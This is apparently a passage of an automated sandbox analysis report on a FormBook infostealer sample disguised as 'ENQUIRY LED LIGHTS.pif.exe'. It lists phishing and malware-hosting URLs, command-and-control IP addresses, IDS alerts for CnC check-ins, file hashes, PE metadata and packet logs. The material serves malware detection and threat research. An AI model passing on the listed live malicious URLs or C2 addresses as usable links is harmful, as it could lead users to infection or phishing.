                                                                                                https://u47918368.ct.sendgrid.net/ls/click?upn=u001.-2BOo3JYTQYuIFaBSzf7AB64dVRTqkGjH0MRM8KyM0AcZsOP7y7qpKWukjxhDcw92CbJO47QSxKFDJcDiP6WeaFL-2BnK3EFxpudowoMeNAVdeweBd8-2FWlMYHw0bdH9dmRj9FWWLx9-2FZjKKb84F9ITCdIGxoZiMN3mzzvXx07roy7WVNC3vFCOURYxFpe90m2E8wJ9PxEH58lcyIBohCQwrgcA-3D-3D7Qgj_AsQvLq31PKXxx3tM00egmVFtswxWHNiAKAW7v-2BME9y3foxrTpQ6z5Y5Y3k6TX-2BTbdqWMdZVTacuc-2FsKla-2BQnDyhxuGfrDPGC0inve5ZGuY9bJGKrM5EaK8IdC3aHxgKXMexjApq1Yv-2Fo2nkdHzmaIMX05B-2BRcK00sZCPCageoDEFAP0MeynrbN6eJfLKupbsQbWTUFPTXUzcncjU8U51AySRGzNQgfTZ5bFcAOShlFKqsuf25KciTGdGP3A-2FBofD5YR3osO6IK-2BefoTwxAt1P4CtUrODXihiP08tFb44snucy1SwxfDMueKUMHcRTuAXbf1k4HMxx5M9-2F4k46qOhvuaLiVUWL6XnB96ND-2BJesqeyrDYcH7gQDBkF-2Ft9dOfbph87RveTLjaU71K5zlVGHj5DbweGtprlQzW-2FAVa2qxgamgU-2BdVnaIdAfsqwI00wESnUW9OKgd-2FZSqxAaB9p-2F-2BYoTjgZf-2F43lM89eNMZonRv3e8C1Aoxa-2FsV8mYg89iRruh-2FvRiJkUcrVbbYatzvOSlR7zePoUWntrdLvmh4abI8n-2B4a6l6OHt00KAAzuzuPz5RFpduPDEuP-2FPPfJYC4wrQig4u5dvMcDSr3O5WPP6KupGDnHTn6vziIr23gkn3gj6EeAbpU1HpirN1A7rynpdvPvGTD-2FchgcZzQ9-2B4rUpO1IBcbVKgv5LeX4QGG1wNAdBCEPAUor8s8H1Ni2p3PqFRP6Mx6H3i19ISLPUg1Z-2B5EgTIPf1f4RHs1VwzG1Dq-2BG-2FzvuJxxkNZwyLv4aHan0-2BAU5E63umNxQDiKHthW8CeZp05uXi1-2BiaV-2FzgIRx32rFDuQJkUP6DqfWApsjY1ZCFZPLDZyUpWGwnMcG-2BRW5xv25mekUrT9aB2RxMGLSAJykNRSOSjaz0DAuYI7hPs-2BovbbN1slvb8Jkm1ZsUjPOcqsQ-3DGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                • 18.245.31.5
                                                                                                https://u47918366.ct.sendgrid.net/ls/click?upn=u001.skYLek12KWTy-2FVz15U1JGdpJfnayI4kQ0pGqHar3Dl5XD61duaRQIcmphf6sxsCT3pRESnljQSclapQG6uG3pGdVz-2B44bL9s03KAUTE5StMNIlD8xnCLLZ8lGkQWJZW6RJC-2FMS-2FmtqbnkGnTi61-2FLZhA8Cc9B2EegTHLtsNl-2BkepLTVNywnsBwsMX7xHmoWV3Dw2rHKhcl7GdTKnanH-2B2A-3D-3DsAd4_IsYeSBG-2BZ-2BTZ5It1-2BmoDsqC7nKwYR7zCsxLhuNGeEDAE80ci2YLaQMl4Chr-2FJ1Dy-2F1t-2Bt6wYBNbbXZWDZJ-2F9gxipPIVyTE-2BwkCxJb2yh-2FK571oS4WTX4wK-2B6Bz-2By5o6LaoWIUw4RL-2Be7Zu2FVjT9YRZQb18hVaXy01EnbzLh42VW9cm4LoyyvSEHNmuGsq4V3weKi-2B8ktOeXeZJ6itTfNUv90Hzr8Pks2E-2BUaeQAL4JtRydjpVfX1b-2Bb-2Br-2FLCz7N-2FWK5lEkS1jhZiYhjiqJboEKBErmNmNqMjZ-2BwyTOtY3BEE6XfRhXZ5MKCe5e9aBCpDkCtemfmauVKvLSP-2FbQ0Vmybk-2F7qA6I2Ku8cl2S1QWU3bOenut3g1b-2Fjhmr55tVtbCkJFEYXmZH0LATBv2XqsJp7O4OwfKJFhIE0bG6aRwM1uirpzCjO2IaFMBAlTI1SxTdJDdWZHOxzctWmXFVbN942FUcBds73LQ2GOGQP4XYhfMQSMHFId2qF3wvlUByd2ligk1qXM5QRquqHZW2LGZQuY8BJgN-2FcXCuzLwGQggx51jbD-2BaZogYVhObsRQIFw5QRieniieQwSt-2BCtR2cOnQB7wMuO2cen79ZEd3199uy3IVW1-2BOMJ9W6y4H9F7IR9mU2c8eigwx1-2Bv-2B7ZIdRKLM9EPP7tvXzM9KfbzlZXEXm4FEEtRO1Kjwz8Qm3lpEO6z3DYDCbAH3tN-2FdBnl08ntv4xVTHXg9zmsSPDluQjxpAJW97WDEz7bfIYDvII7tVhow1OgNWW3Za5ZIaPFlCUrGxxs4FlaLX4Nyw-2BFQrejqFq1o5ipLur5fLE9E2EFQ65iIHEhVDsb1YYcER4UDPxzNYx5zFubvHiPSjMQ62CeJk-3DGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                • 18.245.31.89
                                                                                                https://ganttexcel.s3-us-west-1.amazonaws.com/Gantt_Excel_Pro_Daily_Free1.xlsmGet hashmaliciousUnknownBrowse
                                                                                                • 52.219.117.57
                                                                                                Https://mt5-deriv-server-02.netlify.appGet hashmaliciousUnknownBrowse
                                                                                                • 3.125.36.175
                                                                                                NAMECHEAP-NETUSIbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                • 162.0.231.203
                                                                                                56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                                • 68.65.122.222
                                                                                                p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                                • 68.65.122.222
                                                                                                wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                                                                • 162.213.249.216
                                                                                                ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                                                • 162.0.238.238
                                                                                                b9Mm2hq1pU.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                • 198.54.122.135
                                                                                                SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                                • 192.64.118.221
                                                                                                Quote_General_Tech_LLC_637673,PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                • 162.0.225.218
                                                                                                debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                                • 162.0.231.203
                                                                                                QNBSWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                • 162.0.238.246
                                                                                                AMAZONEXPANSIONGBhttps://rebrand.ly/32mqjh6Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 3.33.143.57
                                                                                                Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                PO_11000262.vbsGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                Follow up - DoorDash Corporate Platform.msgGet hashmaliciousUnknownBrowse
                                                                                                • 3.33.169.150
                                                                                                https://averellharriman.sharefile.com/public/share/web-sab7e0a816d3e4e0ca3a0899254901a6dGet hashmaliciousUnknownBrowse
                                                                                                • 3.33.222.159
                                                                                                https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Get hashmaliciousUnknownBrowse
                                                                                                • 3.33.222.159
                                                                                                Adobeflash.msiGet hashmaliciousAteraAgentBrowse
                                                                                                • 52.223.39.232
                                                                                                IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ENQUIRY LED LIGHTS.pif.exe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.34331486778365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                C:\Users\user\AppData\Local\Temp\34R62IL6

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\SearchFilterHost.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.634028410443898
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:ENQUIRY LED LIGHTS.pif.exe
                                                                                                File size:1'024'512 bytes
                                                                                                MD5:120c54a53b6678586cc21f6eefb3c3a5
                                                                                                SHA1:52b149e7d7bfd16ef2b108e4ef4d8c6cd28cfab5
                                                                                                SHA256:8311884c536e402615c44c0010553cb85718a79a82fa59f90bbdc79321cc60c5
                                                                                                SHA512:a6c6f11321b3a6510a31d810bd78a773f903c4f5692da6f0036298e60430bc63bf7f387884002d6d41adb4a6408b9c287bedc20c801a708949930ff22d91d12c
                                                                                                SSDEEP:24576:Fc2t5szG62Qtv2utcLTICo9rzOwbEqZX:Fc23yGStv2utcLTq9rzOwwq
                                                                                                TLSH:EC25BED03665AB19DE6D4BB8C059DC3483B81D64B005FBAE5ED877DB38B9320A908F47
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M+g..............0..P...P.......o... ........@.. ....................................@................................

                                                                                                File Icon

                                                                                                Icon Hash:1365d6b2924c718f

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x4f6fb6
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x672B4D9A [Wed Nov 6 11:06:02 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                adc al, 00h
                                                                                                add byte ptr [eax], al
                                                                                                adc dword ptr [eax], eax
                                                                                                add byte ptr [eax], al
                                                                                                adc dword ptr [eax], eax
                                                                                                add byte ptr [eax], al
                                                                                                adc byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                sldt word ptr [eax]
                                                                                                add byte ptr [esi], cl
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [esi], cl
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax+eax], cl
                                                                                                add byte ptr [eax], al
                                                                                                or al, 00h
                                                                                                add byte ptr [eax], al
                                                                                                or al, 00h
                                                                                                add byte ptr [eax], al
                                                                                                or al, byte ptr [eax]
                                                                                                add byte ptr [eax], al
                                                                                                or eax, 0C000000h
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [ebx], cl
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [edi], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xf6f640x4f.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf80000x4ce4.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xfe0000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000xf4ffc0xf50001fd75997040d2026cd90856d4c5229f0False0.8158452248086735OpenPGP Public Key7.630840846842573IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xf80000x4ce40x4e00c328234dd64fae2a1a1127a9c89e7a20False0.9481670673076923data7.832056499096397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xfe0000xc0x200275eac16c9b1e10727dcf51df382541dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_ICON0xf80c80x48cdPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.991039330364329
                                                                                                RT_GROUP_ICON0xfc9a80x14data1.05
                                                                                                RT_VERSION0xfc9cc0x314data0.41751269035532995

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Network Behavior

                                                                                                Suricata IDS Alerts

                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2024-11-06T13:41:20.543853+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449735TCP
                                                                                                2024-11-06T13:41:42.019215+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.451155TCP
                                                                                                2024-11-06T13:41:43.858729+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.451156TCP
                                                                                                2024-11-06T13:42:07.383224+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4512013.33.130.19080TCP
                                                                                                2024-11-06T13:42:07.383224+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4512013.33.130.19080TCP
                                                                                                2024-11-06T13:42:28.498327+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45131575.2.103.2380TCP
                                                                                                2024-11-06T13:42:31.003463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45132975.2.103.2380TCP
                                                                                                2024-11-06T13:42:33.735051+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45134575.2.103.2380TCP
                                                                                                2024-11-06T13:42:36.169295+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45135875.2.103.2380TCP
                                                                                                2024-11-06T13:42:36.169295+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45135875.2.103.2380TCP
                                                                                                2024-11-06T13:42:50.990838+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451427172.67.163.17180TCP
                                                                                                2024-11-06T13:42:53.615741+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451428172.67.163.17180TCP
                                                                                                2024-11-06T13:42:56.271768+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451429172.67.163.17180TCP
                                                                                                2024-11-06T13:42:59.693800+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.451430172.67.163.17180TCP
                                                                                                2024-11-06T13:42:59.693800+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.451430172.67.163.17180TCP
                                                                                                2024-11-06T13:43:06.146500+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451431162.0.231.20380TCP
                                                                                                2024-11-06T13:43:08.752984+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451432162.0.231.20380TCP
                                                                                                2024-11-06T13:43:11.920944+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.451433162.0.231.20380TCP

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Nov 6, 2024 13:42:06.750691891 CET5120180192.168.2.43.33.130.190
                                                                                                Nov 6, 2024 13:42:06.755877018 CET80512013.33.130.190192.168.2.4
                                                                                                Nov 6, 2024 13:42:06.755942106 CET5120180192.168.2.43.33.130.190
                                                                                                Nov 6, 2024 13:42:06.775727987 CET5120180192.168.2.43.33.130.190
                                                                                                Nov 6, 2024 13:42:06.780627012 CET80512013.33.130.190192.168.2.4
                                                                                                Nov 6, 2024 13:42:07.382656097 CET80512013.33.130.190192.168.2.4
                                                                                                Nov 6, 2024 13:42:07.383174896 CET80512013.33.130.190192.168.2.4
                                                                                                Nov 6, 2024 13:42:07.383224010 CET5120180192.168.2.43.33.130.190
                                                                                                Nov 6, 2024 13:42:07.394017935 CET5120180192.168.2.43.33.130.190
                                                                                                Nov 6, 2024 13:42:07.398999929 CET80512013.33.130.190192.168.2.4
                                                                                                Nov 6, 2024 13:42:27.797710896 CET5131580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:27.802685976 CET805131575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:27.802783966 CET5131580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:27.826230049 CET5131580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:27.831662893 CET805131575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:28.496249914 CET805131575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:28.498327017 CET5131580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:29.334669113 CET5131580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:29.339524984 CET805131575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:30.371326923 CET5132980192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:30.376460075 CET805132975.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:30.376590967 CET5132980192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:30.399317026 CET5132980192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:30.404475927 CET805132975.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:31.003397942 CET805132975.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:31.003463030 CET5132980192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:31.912403107 CET5132980192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:31.917900085 CET805132975.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.949547052 CET5134580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:32.955132008 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.955245972 CET5134580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:32.982907057 CET5134580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:32.988099098 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988110065 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988151073 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988161087 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988200903 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988337040 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988347054 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988351107 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:32.988452911 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:33.734982967 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:33.735050917 CET5134580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:34.490411043 CET5134580192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:34.495260954 CET805134575.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:35.527666092 CET5135880192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:35.532778025 CET805135875.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:35.532876015 CET5135880192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:35.552815914 CET5135880192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:35.557837963 CET805135875.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:36.168476105 CET805135875.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:36.169135094 CET805135875.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:36.169295073 CET5135880192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:36.178936005 CET5135880192.168.2.475.2.103.23
                                                                                                Nov 6, 2024 13:42:36.183752060 CET805135875.2.103.23192.168.2.4
                                                                                                Nov 6, 2024 13:42:49.447937965 CET5142780192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:49.452836037 CET8051427172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:49.452945948 CET5142780192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:49.476861000 CET5142780192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:49.481735945 CET8051427172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:50.990838051 CET5142780192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:50.996089935 CET8051427172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:50.996187925 CET5142780192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:52.078816891 CET5142880192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:52.083911896 CET8051428172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:52.083985090 CET5142880192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:52.107367039 CET5142880192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:52.112240076 CET8051428172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:53.615741014 CET5142880192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:53.621167898 CET8051428172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:53.621258974 CET5142880192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:54.731234074 CET5142980192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:54.736156940 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.736274004 CET5142980192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:54.765788078 CET5142980192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:42:54.770816088 CET8051429172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:42:54.770827055 CET8051429172.67.163.171192.168.2.4
